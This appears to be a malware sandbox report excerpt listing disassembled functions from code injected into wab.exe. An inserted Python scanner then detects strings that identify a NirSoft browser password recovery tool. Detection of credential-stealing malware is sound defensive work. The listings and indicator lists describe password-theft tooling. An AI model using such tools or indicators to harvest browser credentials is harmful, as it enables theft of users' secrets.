                  • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                  • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                  • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                  • String ID: 0$6
                  • API String ID: 4066108131-3849865405
                  • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                  • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                  • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                  • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                  APIs
                  • memset.MSVCRT ref: 004082EF
                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                  • memset.MSVCRT ref: 00408362
                  • memset.MSVCRT ref: 00408377
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$ByteCharMultiWide
                  • String ID:
                  • API String ID: 290601579-0
                  • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                  • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                  • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                  • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memchrmemset
                  • String ID: PD$PD
                  • API String ID: 1581201632-2312785699
                  • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                  • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                  • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                  • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                  APIs
                  • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                  • GetSystemMetrics.USER32(00000010), ref: 00409F61
                  • GetDC.USER32(00000000), ref: 00409F6E
                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                  • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                  • GetWindowRect.USER32(?,?), ref: 00409FA0
                  • GetParent.USER32(?), ref: 00409FA5
                  • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                  • String ID:
                  • API String ID: 2163313125-0
                  • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                  • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                  • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                  • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@$wcslen
                  • String ID:
                  • API String ID: 239872665-3916222277
                  • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                  • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                  • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                  • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpywcslen$_snwprintfmemset
                  • String ID: %s (%s)$YV@
                  • API String ID: 3979103747-598926743
                  • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                  • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                  • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                  • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                  APIs
                  • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                  • wcslen.MSVCRT ref: 0040A6B1
                  • wcscpy.MSVCRT ref: 0040A6C1
                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                  • wcscpy.MSVCRT ref: 0040A6DB
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                  • String ID: Unknown Error$netmsg.dll
                  • API String ID: 2767993716-572158859
                  • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                  • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                  • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                  • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                  APIs
                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                  • wcscpy.MSVCRT ref: 0040DAFB
                  • wcscpy.MSVCRT ref: 0040DB0B
                  • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                    • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfilewcscpy$AttributesFileString
                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                  • API String ID: 3176057301-2039793938
                  • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                  • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                  • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                  • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                  APIs
                  Strings
                  • database is already attached, xrefs: 0042F721
                  • out of memory, xrefs: 0042F865
                  • too many attached databases - max %d, xrefs: 0042F64D
                  • database %s is already in use, xrefs: 0042F6C5
                  • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                  • unable to open database: %s, xrefs: 0042F84E
                  • cannot ATTACH database within transaction, xrefs: 0042F663
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpymemset
                  • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                  • API String ID: 1297977491-2001300268
                  • Opcode ID: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                  • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                  • Opcode Fuzzy Hash: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                  • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                  APIs
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                  • memcpy.MSVCRT ref: 0040EB80
                  • memcpy.MSVCRT ref: 0040EB94
                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                  • String ID: ($d
                  • API String ID: 1140211610-1915259565
                  • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                  • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                  • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                  • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                  APIs
                  • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                  • Sleep.KERNEL32(00000001), ref: 004178E9
                  • GetLastError.KERNEL32 ref: 004178FB
                  • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$ErrorLastLockSleepUnlock
                  • String ID:
                  • API String ID: 3015003838-0
                  • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                  • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                  • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                  • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                  APIs
                  • memset.MSVCRT ref: 00407E44
                  • memset.MSVCRT ref: 00407E5B
                  • _mbscpy.MSVCRT ref: 00407E7E
                  • _mbscpy.MSVCRT ref: 00407ED7
                  • _mbscpy.MSVCRT ref: 00407EEE
                  • _mbscpy.MSVCRT ref: 00407F01
                  • wcscpy.MSVCRT ref: 00407F10
                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                  • String ID:
                  • API String ID: 59245283-0
                  • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                  • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                  • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                  • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                  APIs
                  • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                  • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                  • GetLastError.KERNEL32 ref: 0041855C
                  • Sleep.KERNEL32(00000064), ref: 00418571
                  • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                  • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                  • GetLastError.KERNEL32 ref: 0041858E
                  • Sleep.KERNEL32(00000064), ref: 004185A3
                  • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$AttributesDeleteErrorLastSleep$??3@
                  • String ID:
                  • API String ID: 3467550082-0
                  • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                  • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                  • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                  • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                  • API String ID: 3510742995-3273207271
                  • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                  • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                  • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                  • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                  APIs
                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                  • memset.MSVCRT ref: 00413ADC
                  • memset.MSVCRT ref: 00413AEC
                    • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                  • memset.MSVCRT ref: 00413BD7
                  • wcscpy.MSVCRT ref: 00413BF8
                  • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$wcscpy$CloseHandleOpenProcess
                  • String ID: 3A
                  • API String ID: 3300951397-293699754
                  • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                  • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                  • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                  • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                  • wcscpy.MSVCRT ref: 0040D1B5
                    • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                    • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                  • wcslen.MSVCRT ref: 0040D1D3
                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                  • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                  • memcpy.MSVCRT ref: 0040D24C
                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                  • String ID: strings
                  • API String ID: 3166385802-3030018805
                  • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                  • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                  • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                  • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                  APIs
                  • memset.MSVCRT ref: 00411AF6
                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                  • wcsrchr.MSVCRT ref: 00411B14
                  • wcscat.MSVCRT ref: 00411B2E
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: FileModuleNamememsetwcscatwcsrchr
                  • String ID: AE$.cfg$General$EA
                  • API String ID: 776488737-1622828088
                  • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                  • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                  • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                  • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                  APIs
                  • memset.MSVCRT ref: 0040D8BD
                  • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                  • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                  • memset.MSVCRT ref: 0040D906
                  • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                  • _wcsicmp.MSVCRT ref: 0040D92F
                    • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                    • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                  • String ID: sysdatetimepick32
                  • API String ID: 1028950076-4169760276
                  • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                  • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                  • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                  • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memset
                  • String ID: -journal$-wal
                  • API String ID: 438689982-2894717839
                  • Opcode ID: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                  • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                  • Opcode Fuzzy Hash: dbb6fae49c61f74d6f433767b436fbd9ec9999f6e4b570cef93805d1319e1532
                  • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
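The function listings above for the module mapped at 0x400000 in wab.exe (process 11) carry strings that identify what that module is: the NirSoft HTML report template (`http://www.nirsoft.net/`, the HTML 3.2 DOCTYPE, `<table dir="rtl">`), the NirSoft language-file keys (`TranslatorName`, `TranslatorURL`), and SQLite's ATTACH error messages plus the `-journal` / `-wal` file suffixes that an embedded SQLite engine uses to read browser credential databases. Together with the report's "Yara detected WebBrowserPassView" signature, they indicate a NirSoft browser password recovery tool injected into wab.exe. The scanner below is an added triage example, not part of the Joe Sandbox report or of any Joe Sandbox tooling: it searches a raw memory dump for those strings, trying both ASCII and UTF-16LE since the report does not state each string's encoding, and applies a grouping and a two-group heuristic that are this example's own choices. The `SAMPLE` buffer is constructed here for demonstration.

```python
import re

# Strings copied verbatim from the report's "String ID" fields for the
# 0x400000 dump, grouped by what they point to. The group names and the
# grouping itself are this example's own choice, not the report's.
INDICATORS = {
    "nirsoft_html_report": [
        '<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>',
        '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">',
        '<table dir="rtl"><tr><td>',
    ],
    "nirsoft_language_file": [
        "TranslatorName",
        "TranslatorURL",
    ],
    "embedded_sqlite": [
        "too many attached databases - max %d",
        "cannot ATTACH database within transaction",
        "attached databases must use the same text encoding as main database",
        "unable to open database: %s",
        "-journal",   # short tokens: weak on their own, counted but not decisive
        "-wal",
    ],
}


def _compile_patterns():
    """One literal regex per (group, string, encoding); both encodings are
    tried because the report lists the strings without stating their width."""
    pats = []
    for group, strings in INDICATORS.items():
        for s in strings:
            for enc in ("ascii", "utf-16-le"):
                pats.append((group, s, enc, re.compile(re.escape(s.encode(enc)))))
    return pats


PATTERNS = _compile_patterns()


def scan(buf: bytes):
    """Return every hit as (group, string, encoding, offset), in pattern order."""
    hits = []
    for group, s, enc, rx in PATTERNS:
        for m in rx.finditer(buf):
            hits.append((group, s, enc, m.start()))
    return hits


def summarize(hits):
    """Map each indicator group to the number of distinct strings seen."""
    found = {}
    for group, s, _enc, _off in hits:
        found.setdefault(group, set()).add(s)
    return {g: len(v) for g, v in found.items()}


def looks_like_browser_password_tool(buf: bytes) -> bool:
    """Heuristic (this example's own): the NirSoft report template must be
    present, corroborated by at least one other group. SQLite strings alone
    are not enough, since many benign programs embed SQLite."""
    groups = summarize(scan(buf))
    return "nirsoft_html_report" in groups and len(groups) >= 2


# Constructed sample dump: a few of the indicators embedded with the encodings
# the neighbouring CRT calls suggest (wcscpy/_snwprintf -> UTF-16LE for the
# HTML template, memcpy/memset -> ASCII for the SQLite messages).
SAMPLE = (
    b"\x00" * 16
    + '<table dir="rtl"><tr><td>'.encode("utf-16-le")
    + b"\x00" * 8
    + b"cannot ATTACH database within transaction\x00"
    + b"-journal\x00-wal\x00"
    + "TranslatorURL".encode("utf-16-le")
)

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
    print(summarize(SAMPLE and scan(SAMPLE)))
    print("browser password tool:", looks_like_browser_password_tool(SAMPLE))
```

Run it against a real dump with `scan(open(path, "rb").read())`; on a full process dump expect the short SQLite tokens to fire in unrelated modules, which is why the verdict function keys on the NirSoft template rather than on hit counts.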
                  APIs
                  • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                  • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                  • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                  • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                  • EndDialog.USER32(?,00000002), ref: 00405C83
                  • EndDialog.USER32(?,00000001), ref: 00405C98
                    • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                    • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                  • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                  • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Item$Dialog$MessageSend
                  • String ID:
                  • API String ID: 3975816621-0
                  • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                  • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                  • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                  • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                  APIs
                  • _wcsicmp.MSVCRT ref: 00444D09
                  • _wcsicmp.MSVCRT ref: 00444D1E
                  • _wcsicmp.MSVCRT ref: 00444D33
                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                    • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _wcsicmp$wcslen$_memicmp
                  • String ID: .save$http://$https://$log profile$signIn
